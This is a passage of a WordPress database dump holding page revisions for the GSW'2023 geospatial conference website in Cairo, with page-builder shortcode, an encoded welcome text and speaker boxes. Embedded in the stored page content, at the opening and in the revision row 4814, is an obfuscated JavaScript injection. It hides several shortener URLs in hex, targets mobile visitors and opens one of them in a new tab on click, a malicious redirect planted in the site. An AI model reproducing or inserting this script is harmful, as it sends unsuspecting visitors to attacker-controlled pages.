_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 02:10:24','2023-06-24 02:10:24','',3066,'https://gsw2023.com/?p=4813',0,'revision','',0),
(4814,4,'2023-06-25 15:40:11','2023-06-25 15:40:11','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\r\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_','','inherit','closed','closed','','3063-revision-v1','','','2023-06-25 15:40:11','2023-06-25 15:40:11','',3063,'https://gsw2023.com/?p=4814',0,'revision','',0),
(4815,4,'2023-06-25 15:40:37','2023-06-25 15:40:37','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column 